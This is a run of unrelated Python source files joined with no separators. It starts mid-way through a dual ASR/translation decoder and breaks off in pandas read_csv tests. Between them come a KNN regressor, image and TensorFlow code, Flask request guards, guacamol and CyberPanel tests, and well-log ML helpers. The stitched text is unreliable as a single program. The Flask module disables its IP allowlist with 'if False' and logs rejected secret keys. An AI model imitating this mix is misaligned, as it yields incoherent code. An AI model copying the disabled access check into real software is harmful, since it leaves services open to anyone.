self_attention_dropout_rate) if (cross_src and cross_to_st) else None, cross_src_attn_asr=MultiHeadedAttention(attention_heads, attention_dim, self_attention_dropout_rate) if (cross_src and cross_to_asr) else None, dropout_rate=dropout_rate, normalize_before=normalize_before, concat_after=concat_after, cross_operator=cross_operator, cross_weight_learnable=cross_weight_learnable, cross_weight=cross_weight, cross_to_asr=cross_to_asr, cross_to_st=cross_to_st, adapters=nn.ModuleDict({k: Adapter(attention_dim, attention_dim//reduction_factor) for k in adapter_names}) if adapter_names else None, ) ) if self.normalize_before: self.after_norm = LayerNorm(attention_dim) self.after_norm_asr = LayerNorm(attention_dim) if use_output_layer: self.output_layer = torch.nn.Linear(attention_dim, odim_tgt) self.output_layer_asr = torch.nn.Linear(attention_dim, odim_src) else: self.output_layer = None self.output_layer_asr = None def forward(self, tgt, tgt_mask, tgt_asr, tgt_mask_asr, memory, memory_mask, cross_mask, cross_mask_asr, cross_self=False, cross_src=False, cross_self_from="before-self", cross_src_from="before-src"): """Forward decoder. :param torch.Tensor tgt: input token ids, int64 (batch, maxlen_out) if input_layer == "embed" input tensor (batch, maxlen_out, #mels) in the other cases :param torch.Tensor tgt_mask: input token mask, (batch, maxlen_out) dtype=torch.uint8 in PyTorch 1.2- dtype=torch.bool in PyTorch 1.2+ (include 1.2) :param torch.Tensor memory: encoded memory, float32 (batch, maxlen_in, feat) :param torch.Tensor memory_mask: encoded memory mask, (batch, maxlen_in) dtype=torch.uint8 in PyTorch 1.2- dtype=torch.bool in PyTorch 1.2+ (include 1.2) :return x: decoded token score before softmax (batch, maxlen_out, token) if use_output_layer is True, final block outputs (batch, maxlen_out, attention_dim) in the other cases :rtype: torch.Tensor :return tgt_mask: score mask before softmax (batch, maxlen_out) :rtype: torch.Tensor """ x = self.embed(tgt) x_asr = self.embed_asr(tgt_asr) if self.adapter_names: lang_id = str(tgt[:, 0:1][0].item()) else: lang_id = None x, tgt_mask, x_asr, tgt_mask_asr, memory, memory_mask, _, _, _, _, _, _ = self.dual_decoders(x, tgt_mask, x_asr, tgt_mask_asr, memory, memory_mask, cross_mask, cross_mask_asr, cross_self, cross_src, cross_self_from, cross_src_from, lang_id) if self.normalize_before: x = self.after_norm(x) x_asr = self.after_norm_asr(x_asr) if self.output_layer is not None: x = self.output_layer(x) x_asr = self.output_layer_asr(x_asr) return x, tgt_mask, x_asr, tgt_mask_asr def forward_one_step(self, tgt, tgt_mask, tgt_asr, tgt_mask_asr, memory, cross_mask=None, cross_mask_asr=None, cross_self=False, cross_src=False, cross_self_from="before-self", cross_src_from="before-src", cache=None, cache_asr=None): """Forward one step. :param torch.Tensor tgt: input token ids, int64 (batch, maxlen_out) :param torch.Tensor tgt_mask: input token mask, (batch, maxlen_out) dtype=torch.uint8 in PyTorch 1.2- dtype=torch.bool in PyTorch 1.2+ (include 1.2) :param torch.Tensor memory: encoded memory, float32 (batch, maxlen_in, feat) :param List[torch.Tensor] cache: cached output list of (batch, max_time_out-1, size) :return y, cache: NN output value and cache per `self.decoders`. `y.shape` is (batch, maxlen_out, token) :rtype: Tuple[torch.Tensor, List[torch.Tensor]] """ x = self.embed(tgt) x_asr = self.embed_asr(tgt_asr) if cache is None: cache = self.init_state() if cache_asr is None: cache_asr = self.init_state() new_cache = [] new_cache_asr = [] for c, c_asr, dual_decoder in zip(cache, cache_asr, self.dual_decoders): x, tgt_mask, x_asr, tgt_mask_asr, memory, _, _, _, _, _, _, _ = dual_decoder(x, tgt_mask, x_asr, tgt_mask_asr, memory, None, cross_mask, cross_mask_asr, cross_self, cross_src, cross_self_from, cross_src_from, cache=c, cache_asr=c_asr) new_cache.append(x) new_cache_asr.append(x_asr) if self.normalize_before: y = self.after_norm(x[:, -1]) y_asr = self.after_norm_asr(x_asr[:, -1]) else: y = x[:, -1] y_asr = x_asr[:, -1] if self.output_layer is not None: y = torch.log_softmax(self.output_layer(y), dim=-1) y_asr = torch.log_softmax(self.output_layer_asr(y_asr), dim=-1) return y, new_cache, y_asr, new_cache_asr # beam search API (see ScorerInterface) def init_state(self, x=None): """Get an initial state for decoding.""" return [None for i in range(len(self.dual_decoders))]
import numpy as np from math import sqrt import pandas as pd class KNN_regresion_Jose: # Initialize class variables def __init__(self, file_name): # Read from data set to a numpy array self.data_set_reg = np.genfromtxt(file_name, delimiter=',') self.entries_data = np.shape(self.data_set_reg)[0] self.len_data = np.shape(self.data_set_reg[0])[0] self.testing_data_set = None self.len_test_data = None # DISTANCE FORMULA FUNCTIONS # Calculates the euclidean distance between 2 vectors def distance_euclidean(self, c: "Int", target) -> "Double": return np.sqrt(np.sum(np.square(np.subtract(target[:self.len_data - 1], self.data_set_reg[c, :self.len_data - 1])))) # Calculates the manhattan distance between 2 vectors def distance_manhattan(self, c: "Int", target) -> "Double": return np.sum(np.abs(np.subtract(target[:self.len_data - 1], self.data_set_reg[c, :self.len_data - 1]))) # FUNCTION SETTERS def _set_k(self, k_measure: "string") -> "None": switcher = { 'static-3': 3, 'static-10': 10, 'static-15': 15, 'squared': np.round(np.sqrt(self.entries_data)), 'n-fold': np.round(self.entries_data / self.len_test_data) + 1 } self.k = switcher.get(k_measure) # This method switches the distance calculating parameter depending on passing parameter. def _set_distance(self, distance: "string") -> "None": switcher = { 'euclidean': self.distance_euclidean, 'manhattan': self.distance_manhattan } self.applier_distance = switcher.get(distance) def value_regression(self, query_target): # Create a Series with indexes of data set to be calculated predicted_values = pd.Series(range(self.entries_data)) # Calculate the distance between each entry in the data set and the query target distances_computed = predicted_values.apply(lambda f: self.applier_distance(f, query_target)) # Obtain the indexes corresponding with the closest distances sorted_distances = np.argsort(distances_computed) # Calculate the formula for regression counted_distances = 0 computed_distances = 0 for i in sorted_distances[:self.k]: distance = 1/np.square(distances_computed[i]) counted_distances += distance computed_distances += distance * self.data_set_reg[i, self.len_data - 1] return computed_distances / counted_distances def test_accuracy(self, file, k_set, distance): # Get the values of the testing data set self.testing_data_set = np.genfromtxt(file, delimiter=',') self.len_test_data = np.shape(self.testing_data_set)[0] # Set the K and distance to calculate self._set_k(k_set) self._set_distance(distance) # Get the average of the true values average_total = np.mean(self.testing_data_set[:, self.len_data - 1], dtype=np.float64) # Calculate the squared residuals and the sum of squares squared_residuals = 0 sum_of_squares = 0 for x in range(self.len_test_data): predicted_value = self.value_regression(self.testing_data_set[x]) squared_residuals += np.square(predicted_value - self.testing_data_set[x, self.len_data - 1]) sum_of_squares += np.square(average_total - self.testing_data_set[x, self.len_data - 1]) # Final R squared r_squared = 1 - (squared_residuals / sum_of_squares) # Print results obtained print('The R squared is {:f}.'.format(r_squared)) print('The parameters used are: K {0} and distance {1}.\n\n'.format(k_set, distance)) dert = KNN_regresion_Jose('regressionData/trainingData.csv') for k in ['static-3', 'static-10', 'static-15', 'squared', 'n-fold']: for tech in ['euclidean', 'manhattan']: dert.test_accuracy('regressionData/testData.csv', k, tech)
"""Tests runner.py module.""" from __future__ import print_function import unittest from mock import patch import test_runners.tf_models.runner as runner class TestRunBenchmark(unittest.TestCase): """Tests for runner.py module.""" @patch('test_runners.tf_models.runner.TestRunner.run_test_suite') @patch('test_runners.tf_models.runner.TestRunner._make_log_dir') def test_resnet50_256_gpu_1_real_fp16(self, _, run_test_suite_mock): """Tests init TestRunner and running a mocked single gpu test.""" run = runner.TestRunner('/workspace', '/workspace/git/tf_models') run.resnet50_256_gpu_1_real_fp16() test_config = run_test_suite_mock.call_args[0][0] # check GPU args and count self.assertEqual(test_config['gpus'], 1) self.assertEqual(test_config['batch_size'], 256) self.assertEqual(test_config['args']['batch_size'], 256) self.assertEqual(test_config['args']['dtype'], 'fp16') self.assertEqual(test_config['test_id'], 'official.resnet50.gpu_1.256.fp16.real') self.assertIn('model', test_config) @patch('test_runners.tf_models.runner.TestRunner.run_test_suite') @patch('test_runners.tf_models.runner.TestRunner._make_log_dir') def test_resnet50_128_gpu_8_real(self, _, run_test_suite_mock): """Tests init TestRunner and running a mocked single gpu test.""" run = runner.TestRunner('/workspace', '/workspace/git/tf_models') run.resnet50_128_gpu_8_real() test_config = run_test_suite_mock.call_args[0][0] # check GPU args and count self.assertEqual(test_config['gpus'], 8) self.assertEqual(test_config['batch_size'], 128) self.assertEqual(test_config['args']['data_dir'], '/data/imagenet') self.assertEqual(test_config['args']['batch_size'], 8*128) self.assertEqual(test_config['args']['resnet_version'], 1) self.assertEqual(test_config['args']['dtype'], 'fp32') self.assertEqual(test_config['test_id'], 'official.resnet50.gpu_8.128.real') self.assertIn('model', test_config)
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # @Time : 1/22/2019 11:52 AM # @Author : Xiang Chen (Richard) # @File : label_data_tfrecord.py # @Software: PyCharm import tensorflow as tf import os import numpy as np from PIL import Image IMAGE_PATH = '/home/ucesxc0/richard/AIS_data_Danish/tianjin_image_result/' IMAGE_LABEL_PATH = '/home/ucesxc0/richard/AIS_data_Danish/tianjin_image_result/' train_label = [] test_label = [] # open files with open(IMAGE_LABEL_PATH + r'\label.txt') as f: i = 1 for line in f.readlines(): if i % 20 == 0: test_label.append(line) else: train_label.append(line) i += 1 np.random.shuffle(train_label) np.random.shuffle(test_label) # transfer the labels def int_to_one_hot(labels): label = [] if labels[0] == -1: label.append([0, 0, 0]) else: label.append([1, 0, 0]) if labels[1] == -1: label.append([0, 0, 0]) else: label.append([0, 1, 0]) if labels[2] == -1: label.append([0, 0, 0]) else: label.append([0, 0, 1]) return label def image_to_tfrecords(list, tf_record_path): tf_write = tf.python_io.TFRecordWriter(tf_record_path) for i in range(len(list)): item = list[i] item = item.strip('\n') items = item.split(',') image_name = items[0] image_path = os.path.join(IMAGE_PATH, image_name) if os.path.isfile(image_path): image = Image.open(image_path) image = image.tobytes() features = {} features['raw_image'] = tf.train.Feature( bytes_list=tf.train.BytesList(value=[image])) labels = int_to_one_hot(items[1:]) features['label_1'] = tf.train.Feature( int64_list=tf.train.Int64List(value=labels[0])) features['label_2'] = tf.train.Feature( int64_list=tf.train.Int64List(value=labels[1])) features['label_3'] = tf.train.Feature( int64_list=tf.train.Int64List(value=labels[2])) tf_features = tf.train.Features(feature=features) example = tf.train.Example(features=tf_features) # protocol buffer tf_serialized = example.SerializeToString() tf_write.write(tf_serialized) else: print("not") tf_write.close() image_to_tfrecords(train_label, '/home/ucesxc0/Scratch/output/training_CNN_new_dataset/train.tfrecords') image_to_tfrecords(test_label, '/home/ucesxc0/Scratch/output/training_CNN_new_dataset/test.tfrecords')
import tensorflow as tf from .model import Model class SRCNN(Model): def __init__(self, args): super().__init__(args) self._prediction_offset = 6 self._lr_offset = self._prediction_offset // self._scale_factor def get_data(self): data_batch, initializer = self.dataset.get_data() lr_batch = tf.cast(data_batch['lr1'], tf.float32) / 255.0 hr_batch = tf.cast(data_batch['hr'], tf.float32) / 255.0 return [lr_batch, hr_batch], initializer def get_placeholder(self): input_ph = tf.placeholder(tf.float32, shape=[1, None, None, 1], name="x") return [input_ph] def load_model(self, data_batch): lr_batch = data_batch[0] with tf.variable_scope('srcnn'): if self._using_dataset: net = tf.image.resize_bicubic(lr_batch, (self._scale_factor * lr_batch.shape[1], self._scale_factor * lr_batch.shape[2]), align_corners=True) else: net = tf.pad(lr_batch, [[0, 0], [6, 6], [6, 6], [0, 0]], 'SYMMETRIC') net = tf.layers.conv2d(net, 64, 9, activation=tf.nn.relu, padding='valid', name='conv1', kernel_initializer=tf.keras.initializers.he_normal()) net = tf.layers.conv2d(net, 32, 1, activation=tf.nn.relu, padding='valid', name='conv2', kernel_initializer=tf.keras.initializers.he_normal()) net = tf.layers.conv2d(net, 1, 5, activation=tf.nn.relu, padding='valid', name='conv3', kernel_initializer=tf.keras.initializers.he_normal()) predicted_batch = tf.maximum(net, 0.0) srcnn_variables = tf.trainable_variables(scope='srcnn') for variable in srcnn_variables: if 'conv3' in variable.name: self.lr_multipliers[variable.name] = 0.1 else: self.lr_multipliers[variable.name] = 1.0 if self._using_dataset: tf.summary.image('Low_resolution', data_batch[0][:, self._lr_offset:-self._lr_offset, self._lr_offset:-self._lr_offset], max_outputs=self._save_num) tf.summary.image('High_resolution', data_batch[1][:, self._prediction_offset:-self._prediction_offset, self._prediction_offset:-self._prediction_offset], max_outputs=self._save_num) tf.summary.image('High_resolution_prediction', predicted_batch, max_outputs=self._save_num) return predicted_batch def get_loss(self, data_batch, predicted_batch): loss = tf.losses.mean_squared_error( data_batch[1][:, self._prediction_offset:-self._prediction_offset, self._prediction_offset:-self._prediction_offset], predicted_batch) tf.summary.scalar('MSE', loss) tf.summary.scalar('PSNR', tf.reduce_mean(tf.image.psnr( data_batch[1][:, self._prediction_offset:-self._prediction_offset, self._prediction_offset:-self._prediction_offset], predicted_batch, max_val=1.0))) tf.summary.scalar('SSIM', tf.reduce_mean(tf.image.ssim( data_batch[1][:, self._prediction_offset:-self._prediction_offset, self._prediction_offset:-self._prediction_offset], predicted_batch, max_val=1.0))) return loss def calculate_metrics(self, data_batch, predicted_batch): diff = data_batch[1][:, self._prediction_offset:-self._prediction_offset, self._prediction_offset:-self._prediction_offset] - predicted_batch diff_sqr = tf.square(diff) mse = ('MSE', tf.reduce_mean(diff_sqr, axis=[1, 2, 3])) psnr = ('PSNR', tf.squeeze(tf.image.psnr( data_batch[1][:, self._prediction_offset:-self._prediction_offset, self._prediction_offset:-self._prediction_offset], predicted_batch, max_val=1.0))) ssim = ('SSIM', tf.squeeze(tf.image.ssim( data_batch[1][:, self._prediction_offset:-self._prediction_offset, self._prediction_offset:-self._prediction_offset], predicted_batch, max_val=1.0))) return [mse, psnr, ssim]
from . import app from flask import abort, request import socket def resolve_dns(domain_name): try: return socket.gethostbyname(domain_name) except socket.gaierror as e: return None def whitelist_ips(): return (ip for ip in (resolve_dns(dns) for dns in app.config['DNS_WHITELIST']) if ip is not None) @app.before_request def verify_secret_key(): try: secret_key = request.view_args['secret_key'] except (KeyError, TypeError): return abort(404) if secret_key != app.config['SECRET_KEY']: app.logger.warning('invalid secret key: %s', secret_key) return abort(403) @app.before_request def limit_remote_addr(): # TODO: whitelist pivotal urls if False and request.remote_addr not in whitelist_ips(): app.logger.warning('remote_addr(%s) not whitelisted. whitelist: %r', request.remote_addr, list(whitelist_ips())) abort(403) app.logger.info('request accepted from %s', request.remote_addr)
from django.apps import AppConfig class VoaConfig(AppConfig): name = 'voa'
# 一段格式錯誤的有效代碼例子 x = 12 if x== 24: print('Is valid') else: print("Is not valid") def helper(name='sample'): pass def another( name = 'sample'): pass print() # 文檔字符串例子 def print_hello(name: str) -> str: """ Greets the user by name Parameters name(str): The name of the user Returns str: The greeting """ print('Hello,' + name) print_hello('heisenberg')
from ..functions.plural_word import plural_word def plural_time(number: int) -> str: if number >= 3600: number //= 3600 unit = 'godzin' elif number >= 60: number //= 60 unit = 'minut' else: unit = 'sekund' return plural_word(number, one=unit + 'ę', few=unit + 'y', many=unit)
from guacamol.distribution_learning_benchmark import ValidityBenchmark, UniquenessBenchmark, NoveltyBenchmark, \ KLDivBenchmark from guacamol.assess_distribution_learning import _assess_distribution_learning from .mock_generator import MockGenerator import numpy as np import tempfile from os.path import join def test_validity_does_not_penalize_duplicates(): generator = MockGenerator(['CCC', 'CCC']) benchmark = ValidityBenchmark(number_samples=2) assert benchmark.assess_model(generator).score == 1.0 def test_validity_score_is_proportion_of_valid_molecules(): generator = MockGenerator(['CCC', 'CC(CC)C', 'invalidMolecule']) benchmark = ValidityBenchmark(number_samples=3) assert benchmark.assess_model(generator).score == 2.0 / 3.0 def test_uniqueness_penalizes_duplicates(): generator = MockGenerator(['CCC', 'CCC', 'CCC']) benchmark = UniquenessBenchmark(number_samples=3) assert benchmark.assess_model(generator).score == 1.0 / 3.0 def test_uniqueness_penalizes_duplicates_with_different_smiles_strings(): generator = MockGenerator(['C(O)C', 'CCO', 'OCC']) benchmark = UniquenessBenchmark(number_samples=3) assert benchmark.assess_model(generator).score == 1.0 / 3.0 def test_uniqueness_does_not_penalize_invalid_molecules(): generator = MockGenerator(['C(O)C', 'invalid1', 'invalid2', 'CCC', 'NCCN']) benchmark = UniquenessBenchmark(number_samples=3) assert benchmark.assess_model(generator).score == 1.0 def test_novelty_score_is_zero_if_no_molecule_is_new(): molecules = ['CCOCC', 'NNNNONNN', 'C=CC=C'] generator = MockGenerator(molecules) benchmark = NoveltyBenchmark(number_samples=3, training_set=molecules) assert benchmark.assess_model(generator).score == 0.0 def test_novelty_score_is_one_if_all_molecules_are_new(): generator = MockGenerator(['CCOCC', 'NNNNONNN', 'C=CC=C']) benchmark = NoveltyBenchmark(number_samples=3, training_set=['CO', 'CC']) assert benchmark.assess_model(generator).score == 1.0 def test_novelty_score_does_not_penalize_duplicates(): generator = MockGenerator(['CCOCC', 'O(CC)CC', 'C=CC=C', 'CC']) benchmark = NoveltyBenchmark(number_samples=3, training_set=['CO', 'CC']) # Gets 2 out of 3: one of the duplicated molecules is ignored, so the sampled molecules are # ['CCOCC', 'C=CC=C', 'CC'], and 'CC' is not novel assert benchmark.assess_model(generator).score == 2.0 / 3.0 def test_novelty_score_penalizes_invalid_molecules(): generator = MockGenerator(['CCOCC', 'invalid1', 'invalid2', 'CCCC', 'CC']) benchmark = NoveltyBenchmark(number_samples=3, training_set=['CO', 'CC']) assert benchmark.assess_model(generator).score == 2.0 / 3.0 def test_KLdiv_benchmark_same_dist(): generator = MockGenerator(['CCOCC', 'NNNNONNN', 'C=CC=C']) benchmark = KLDivBenchmark(number_samples=3, training_set=['CCOCC', 'NNNNONNN', 'C=CC=C']) result = benchmark.assess_model(generator) print(result.metadata) assert np.isclose(result.score, 1.0, ) def test_KLdiv_benchmark_different_dist(): generator = MockGenerator(['CCOCC', 'NNNNONNN', 'C=CC=C']) benchmark = KLDivBenchmark(number_samples=3, training_set=['FCCOCC', 'CC(CC)CCCCNONNN', 'C=CC=O']) result = benchmark.assess_model(generator) print(result.metadata) assert result.metadata['number_samples'] == 3 assert result.metadata.get('kl_divs') is not None assert result.metadata['kl_divs'].get('BertzCT') > 0 assert result.metadata['kl_divs'].get('MolLogP', None) > 0 assert result.metadata['kl_divs'].get('MolWt', None) > 0 assert result.metadata['kl_divs'].get('TPSA', None) > 0 assert result.metadata['kl_divs'].get('NumHAcceptors', None) > 0 assert result.metadata['kl_divs'].get('NumHDonors', None) > 0 assert result.metadata['kl_divs'].get('NumRotatableBonds', None) > 0 assert result.score < 1.0 def test_distribution_learning_suite_v1(): generator = MockGenerator( ['CCl', 'CCOCCCl', 'ClCCF', 'CCCOCCOCCCO', 'CF', 'CCOCC', 'CCF', 'CCCOCC', 'NNNNONNN', 'C=CC=C'] * 10) mock_chembl = ['FCCOCC', 'C=CC=O', 'CCl', 'CCOCCCl', 'ClCCF', 'CCCOCCOCCCO', 'CF', 'CCOCC', 'CCF'] temp_dir = tempfile.mkdtemp() smiles_path = join(temp_dir, 'mock.smiles') with open(smiles_path, 'w') as f: for i in mock_chembl: f.write(f'{i}\n') f.close() json_path = join(temp_dir, 'output.json') _assess_distribution_learning(model=generator, chembl_training_file=smiles_path, json_output_file=json_path, benchmark_version='v1', number_samples=4) with open(json_path, 'r') as f: print(f.read())
# -*- coding: utf-8 -*- from django.test import TestCase, Client from django.urls import reverse import json from loginSystem.models import Administrator, ACL from plogical.CyberCPLogFileWriter import CyberCPLogFileWriter as logging # Create your tests here. class TestUserManagement(TestCase): def setUp(self): ## Initiate Client self.client = Client() self.adminLogin = reverse('adminLogin') self.verifyLogin = reverse('verifyLogin') ## Create Login User response = self.client.get(self.adminLogin) # self.assertTemplateUsed(response, 'loginSystem/login.html') self.submitUserCreation = reverse('submitUserCreation') self.submitUserDeletion = reverse('submitUserDeletion') self.saveModifications = reverse('saveModifications') self.fetchUserDetails = reverse('fetchUserDetails') self.saveResellerChanges = reverse('saveResellerChanges') self.createACLFunc = reverse('createACLFunc') self.deleteACLFunc = reverse('deleteACLFunc') self.submitACLModifications = reverse('submitACLModifications') self.saveChangesAPIAccess = reverse('saveChangesAPIAccess') ## Verify login data_ret = {'username': 'admin', 'password': '1234567'} json_data = json.dumps(data_ret) response = self.client.post(self.verifyLogin, json_data, content_type="application/json") json_data = json.loads(response.content) self.assertEqual(json_data['loginStatus'], 1) def test_submitUserCreation(self): ## Login data_ret = {'firstName': 'Usman', 'lastName': 'Nasir', 'email': 'usman@cyberpersons.com', 'userName': 'usman', 'password': '1234567', 'websitesLimit': 50, 'selectedACL':'user', 'securityLevel': 'HIGH'} json_data = json.dumps(data_ret) response = self.client.post(self.submitUserCreation, json_data, content_type="application/json") json_data = json.loads(response.content) self.assertEqual(json_data['status'], 1) self.assertEqual(json_data['createStatus'], 1) self.assertEqual(Administrator.objects.filter(userName='usman').count(), 1) def test_submitUserDeletion(self): self.test_submitUserCreation() data_ret = {'accountUsername': 'usman'} json_data = json.dumps(data_ret) response = self.client.post(self.submitUserDeletion, json_data, content_type="application/json") json_data = json.loads(response.content) self.assertEqual(json_data['status'], 1) self.assertEqual(json_data['deleteStatus'], 1) self.assertEqual(Administrator.objects.filter(userName='usman').count(), 0) def test_saveModifications(self): self.test_submitUserCreation() data_ret = {'accountUsername': 'usman','firstName': 'Rehan', 'lastName': 'Nasir', 'email': 'usman@cyberpersons.com', 'securityLevel': "LOW", 'password': '1234567'} json_data = json.dumps(data_ret) ## Modification response = self.client.post(self.saveModifications, json_data, content_type="application/json") json_data = json.loads(response.content) self.assertEqual(json_data['status'], 1) self.assertEqual(json_data['saveStatus'], 1) ## Check Modification # response = self.client.post(self.fetchUserDetails, json_data, content_type="application/json") # logging.writeToFile(response.content) # json_data = json.loads(response.content) self.assertEqual(Administrator.objects.get(userName='usman').firstName, 'Rehan') self.assertEqual(Administrator.objects.get(userName='usman').lastName, 'Nasir') self.assertEqual(Administrator.objects.get(userName='usman').securityLevel, 1) def test_saveResellerChangess(self): self.test_submitUserCreation() data_ret = {'newOwner': 'admin', 'userToBeModified':'usman', 'websitesLimit': 100} json_data = json.dumps(data_ret) ## Modification response = self.client.post(self.saveResellerChanges, json_data, content_type="application/json") json_data = json.loads(response.content) self.assertEqual(json_data['status'], 1) ## Check Modification # response = self.client.post(self.fetchUserDetails, json_data, content_type="application/json") # logging.writeToFile(response.content) # json_data = json.loads(response.content) self.assertEqual(Administrator.objects.get(userName='usman').initWebsitesLimit, 100) def test_createACLFunc(self): data_ret = {'aclName': 'hello', 'makeAdmin':1, 'createNewUser': 1, 'versionManagement': 1, 'listUsers': 1, 'resellerCenter': 1, 'deleteUser': 1, 'changeUserACL': 1, 'createWebsite': 1, 'modifyWebsite': 1, 'suspendWebsite': 1, 'deleteWebsite': 1, 'createPackage': 1, 'listPackages': 1, 'deletePackage': 1, 'modifyPackage': 1, 'createDatabase': 1, 'deleteDatabase': 1, 'listDatabases': 1, 'createNameServer': 1, 'createDNSZone': 1, 'deleteZone': 1, 'addDeleteRecords': 1, 'createEmail': 1, 'listEmails': 1, 'deleteEmail': 1, 'emailForwarding': 1, 'changeEmailPassword': 1, 'dkimManager': 1, 'createFTPAccount': 1, 'deleteFTPAccount': 1, 'listFTPAccounts': 1, 'createBackup': 1, 'restoreBackup': 1, 'addDeleteDestinations': 1, 'scheDuleBackups': 1, 'remoteBackups': 1, 'manageSSL': 1, 'hostnameSSL': 1, 'mailServerSSL': 1} json_data = json.dumps(data_ret) ## Modification response = self.client.post(self.createACLFunc, json_data, content_type="application/json") json_data = json.loads(response.content) self.assertEqual(json_data['status'], 1) self.assertEqual(ACL.objects.filter(name='hello').count(), 1) def test_deleteACLFunc(self): self.test_createACLFunc() data_ret = {'aclToBeDeleted': 'hello'} json_data = json.dumps(data_ret) response = self.client.post(self.deleteACLFunc, json_data, content_type="application/json") json_data = json.loads(response.content) self.assertEqual(json_data['status'], 1) self.assertEqual(ACL.objects.filter(name='hello').count(), 0) def test_submitACLModifications(self): self.test_createACLFunc() data_ret = {'aclToModify': 'hello', 'adminStatus':1, 'createNewUser': 1, 'versionManagement': 1, 'listUsers': 1, 'resellerCenter': 1, 'deleteUser': 1, 'changeUserACL': 1, 'createWebsite': 1, 'modifyWebsite': 1, 'suspendWebsite': 1, 'deleteWebsite': 1, 'createPackage': 1, 'listPackages': 1, 'deletePackage': 1, 'modifyPackage': 1, 'createDatabase': 1, 'deleteDatabase': 1, 'listDatabases': 1, 'createNameServer': 1, 'createDNSZone': 1, 'deleteZone': 1, 'addDeleteRecords': 1, 'createEmail': 1, 'listEmails': 1, 'deleteEmail': 1, 'emailForwarding': 1, 'changeEmailPassword': 1, 'dkimManager': 1, 'createFTPAccount': 1, 'deleteFTPAccount': 1, 'listFTPAccounts': 1, 'createBackup': 1, 'restoreBackup': 1, 'addDeleteDestinations': 1, 'scheDuleBackups': 1, 'remoteBackups': 1, 'manageSSL': 1, 'hostnameSSL': 1, 'mailServerSSL': 0} json_data = json.dumps(data_ret) ## Modification response = self.client.post(self.submitACLModifications, json_data, content_type="application/json") logging.writeToFile(response.content) json_data = json.loads(response.content) self.assertEqual(json_data['status'], 1) self.assertEqual(ACL.objects.get(name='hello').mailServerSSL, 0) self.assertEqual(ACL.objects.get(name='hello').hostnameSSL, 1) def test_saveChangesAPIAccess(self): self.test_submitUserCreation() data_ret = {'accountUsername': 'usman', 'access': 'Enable'} json_data = json.dumps(data_ret) ## Modification response = self.client.post(self.saveChangesAPIAccess, json_data, content_type="application/json") json_data = json.loads(response.content) self.assertEqual(json_data['status'], 1) ## Check Modification # response = self.client.post(self.fetchUserDetails, json_data, content_type="application/json") # logging.writeToFile(response.content) # json_data = json.loads(response.content) self.assertEqual(Administrator.objects.get(userName='usman').api, 1)
""" Core ML functions""" import pandas as pd from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor from sklearn.multioutput import MultiOutputRegressor from sklearn.pipeline import Pipeline, make_pipeline from sklearn.model_selection import LeavePGroupsOut from sklearn.preprocessing import RobustScaler from sklearn.cluster import KMeans def create_facies(df_logs): """ Adds a facies column from clustering""" pipe = make_pipeline(RobustScaler(), KMeans(n_clusters=4)) X = df_logs[['GR', 'RHOB', 'NPHI', 'DT']] cluster_id = pipe.fit_predict(X) df_logs['facies'] = cluster_id df_logs['facies'] = 'facies_' + df_logs['facies'].astype(str) return df_logs def train_test_split(df_ml): """ Split log data into train and test by well ID """ test_wells = set(['B03', 'B05', 'B06']) train_wells = set(df_ml.HACKANAME.unique()) - test_wells print('Train well: ', train_wells) print('Test wells: ', test_wells) mask_train = df_ml.HACKANAME.isin(train_wells) df_ml_train = df_ml[mask_train] df_ml_test = df_ml[~mask_train] return df_ml_train, df_ml_test def make_model(X_train, y_train, quantile=0.5): """ Returns a trained model """ model = MultiOutputRegressor(GradientBoostingRegressor(loss='quantile', alpha=quantile)) model.fit(X_train, y_train) return model def make_multiple_models(df_ml_train, X_cols, y_cols): """ Returns low, base and high trained models """ X_train = df_ml_train[X_cols] y_train = df_ml_train[y_cols] models = [] models.append(['high', make_model(X_train, y_train, quantile=0.90)]) models.append(['base', make_model(X_train, y_train, quantile=0.50)]) models.append(['low', make_model(X_train, y_train, quantile=0.10)]) return models def make_predictions(models, df_ml, X_cols, y_cols): df_pred = df_ml.copy() """ Use trained models to make predictions, add on to df_ml as new columns """ X = df_pred[X_cols] for name, model in models: y_pred = model.predict(X) pred_cols = [c + '_pred_'+name for c in y_cols] df_pred[pred_cols] = pd.DataFrame(y_pred, index=df_pred.index) return df_pred
""" Tests that work on both the Python and C engines but do not have a specific classification into the other test modules. """ from io import StringIO import numpy as np import pytest from pandas.errors import DtypeWarning from pandas import ( DataFrame, concat, ) import pandas._testing as tm pytestmark = pytest.mark.usefixtures("pyarrow_skip") @pytest.mark.parametrize("index_col", [0, "index"]) def test_read_chunksize_with_index(all_parsers, index_col): parser = all_parsers data = """index,A,B,C,D foo,2,3,4,5 bar,7,8,9,10 baz,12,13,14,15 qux,12,13,14,15 foo2,12,13,14,15 bar2,12,13,14,15 """ expected = DataFrame( [ ["foo", 2, 3, 4, 5], ["bar", 7, 8, 9, 10], ["baz", 12, 13, 14, 15], ["qux", 12, 13, 14, 15], ["foo2", 12, 13, 14, 15], ["bar2", 12, 13, 14, 15], ], columns=["index", "A", "B", "C", "D"], ) expected = expected.set_index("index") with parser.read_csv(StringIO(data), index_col=0, chunksize=2) as reader: chunks = list(reader) tm.assert_frame_equal(chunks[0], expected[:2]) tm.assert_frame_equal(chunks[1], expected[2:4]) tm.assert_frame_equal(chunks[2], expected[4:]) @pytest.mark.parametrize("chunksize", [1.3, "foo", 0]) def test_read_chunksize_bad(all_parsers, chunksize): data = """index,A,B,C,D foo,2,3,4,5 bar,7,8,9,10 baz,12,13,14,15 qux,12,13,14,15 foo2,12,13,14,15 bar2,12,13,14,15 """ parser = all_parsers msg = r"'chunksize' must be an integer >=1" with pytest.raises(ValueError, match=msg): with parser.read_csv(StringIO(data), chunksize=chunksize) as _: pass @pytest.mark.parametrize("chunksize", [2, 8]) def test_read_chunksize_and_nrows(all_parsers, chunksize): # see gh-15755 data = """index,A,B,C,D foo,2,3,4,5 bar,7,8,9,10 baz,12,13,14,15 qux,12,13,14,15 foo2,12,13,14,15 bar2,12,13,14,15 """ parser = all_parsers kwargs = {"index_col": 0, "nrows": 5} expected = parser.read_csv(StringIO(data), **kwargs) with parser.read_csv(StringIO(data), chunksize=chunksize, **kwargs) as reader: tm.assert_frame_equal(concat(reader), expected) def test_read_chunksize_and_nrows_changing_size(all_parsers): data = """index,A,B,C,D foo,2,3,4,5 bar,7,8,9,10 baz,12,13,14,15 qux,12,13,14,15 foo2,12,13,14,15 bar2,12,13,14,15 """ parser = all_parsers kwargs = {"index_col": 0, "nrows": 5} expected = parser.read_csv(StringIO(data), **kwargs) with parser.read_csv(StringIO(data), chunksize=8, **kwargs) as reader: 